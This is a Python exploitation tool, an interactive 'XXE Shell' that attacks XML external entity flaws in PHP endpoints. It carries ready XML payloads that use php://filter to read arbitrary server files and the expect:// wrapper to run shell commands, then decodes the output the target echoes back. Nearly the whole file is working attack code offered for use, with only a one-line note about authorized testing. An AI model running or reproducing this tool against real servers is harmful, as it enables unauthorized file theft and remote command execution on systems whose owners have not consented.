#!/usr/bin/python
import argparse
import base64
import cmd
import requests
import re
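class XXECommandLine(cmd.Cmd):
    """Interactive shell that drives an XXE bug in a PHP XML endpoint.

    Each ``cmd`` / ``getfile`` invocation builds an XML document whose
    external entity is a ``php://filter/convert.base64-encode`` URL, POSTs
    it to ``url`` and decodes the base64 text the target echoes back between
    two literal ``OUT`` markers.  ``getfile`` only needs ``php://filter`` and
    works for any file the web server process can read; ``cmd`` additionally
    relies on the ``expect://`` wrapper, which is a PECL extension and is not
    part of a stock PHP install, so it may simply not resolve on the target.
    Use only against systems you are authorized to test.
    """
    prompt = 'xxe sh$ '
    # Command-execution payload; ``CMD`` is replaced by the shell command.
    xml = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE root ' \
        '[<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/' \
        'resource=expect://CMD" >]><root><name></name><tel>' \
        '</tel><email>OUT&xxe;OUT</email><password></password></root>'
    # File-read payload; ``CMD`` is replaced by the remote path.
    fxml = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE root ' \
        '[<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/' \
        'resource=CMD" >]><root><name></name><tel>' \
        '</tel><email>OUT&xxe;OUT</email><password></password></root>'
    # The capture is the full base64 alphabet, matched greedily, instead of
    # ``[a-zA-Z0-9].+?``: O, U and T are themselves base64 symbols, so a
    # non-greedy match stopped at the first "OUT" that happened to occur
    # inside long output and silently truncated the file; requiring an
    # alphanumeric first character also missed data whose encoding starts
    # with '+' or '/'.  A bytes pattern works on requests' ``.content`` on
    # both Python 2 and 3.
    _marker_re = re.compile(br'OUT([A-Za-z0-9+/=]*)OUT')

    def __init__(self, url):
        """Bind the shell to the vulnerable endpoint at ``url``."""
        cmd.Cmd.__init__(self)
        self.url = url

    @classmethod
    def _extract(cls, body):
        """Return the decoded bytes between the first ``OUT`` marker pair in ``body``.

        Raises ValueError when no marker pair is present (entity did not
        resolve, output not echoed, target not vulnerable) or when the text
        between the markers does not decode as base64.
        """
        hits = cls._marker_re.findall(body)
        if not hits:
            raise ValueError('no OUT...OUT markers in the response')
        try:
            return base64.b64decode(hits[0])
        except (TypeError, ValueError):
            # Python 2 raises TypeError on bad padding, Python 3 binascii.Error.
            raise ValueError('text between the markers is not valid base64')

    def _send(self, template, value):
        """POST ``template`` with ``CMD`` replaced by ``value`` and decode the echo.

        Returns the output bytes, or ``None`` after printing why nothing
        usable came back, so the command loop keeps running instead of
        dying on a traceback.
        """
        if '"' in value:
            # The value lands inside a double-quoted SYSTEM literal in the
            # DTD; a quote ends the literal and the target just fails to parse.
            print('*** a double quote would break the DTD literal; drop it')
            return None
        req = requests.post(self.url, data=template.replace('CMD', value))
        try:
            return self._extract(req.content)
        except ValueError as err:
            print('*** %s (HTTP %d)' % (err, req.status_code))
            return None

    def do_quit(self, arg):
        """quit -- leave the shell."""
        return True

    # Ctrl-D: cmd.Cmd feeds the literal line 'EOF' on end of input; with no
    # handler the default() "Unknown syntax" path runs and the next read is
    # EOF again, so the loop spins forever.
    do_EOF = do_quit

    def do_getfile(self, arg):
        """getfile /remote/path -- read a file through php://filter and save it
        locally under its basename in the current directory (overwriting)."""
        fname = arg[arg.rfind('/') + 1:]
        if not fname or fname in ('.', '..'):
            print('*** usage: getfile /remote/path/to/file')
            return
        data = self._send(self.fxml, arg)
        if data is None:
            return
        with open(fname, 'wb') as fh:
            fh.write(data)

    def do_cmd(self, arg):
        """cmd <shell command> -- run it on the target via expect:// and print
        the output."""
        # Parameter was named ``cmd``, shadowing the stdlib module used above.
        if not arg:
            print('*** usage: cmd <shell command>')
            return
        out = self._send(self.xml, arg)
        if out is not None:
            print(out.decode('utf-8', 'replace'))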
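def banner():
    """Print the XXE Shell ASCII-art banner followed by a blank line.

    The art lines are raw strings: they are full of backslashes that, in
    ordinary literals, are invalid escape sequences newer interpreters warn
    about; raw strings print the same characters without the warning.
    """
    art = (
        r'____ _______ ______________ _________.__ .__ .__ ',
        r'\ \/ /\ \/ /\_ _____/ / _____/| |__ ____ | | | | ',
        r' \ / \ / | __)_ \_____ \ | | \_/ __ \| | | | ',
        r' / \ / \ | \ / \| Y \ ___/| |_| |__',
        r'/___/\ \/___/\ \/_______ / /_______ /|___| /\___ >____/____/',
        r' \_/ \_/ \/ \/ \/ \/ ',
        r' @tygarsai ',
    )
    print('\n'.join(art))
    print('')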
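if __name__ == '__main__':
    # Banner is printed before argument parsing, so it also precedes --help.
    banner()
    parser = argparse.ArgumentParser(
        description='Interactive shell over an XXE bug in a PHP XML endpoint; '
                    'command execution needs the expect:// wrapper on the target.')
    parser.add_argument('url',
                        help='URL of the endpoint that parses the POSTed XML')
    results = parser.parse_args()
    url = results.url
    try:
        XXECommandLine(url).cmdloop()
    except KeyboardInterrupt:
        # Ctrl-C mid-session: leave quietly rather than dumping a traceback.
        print('')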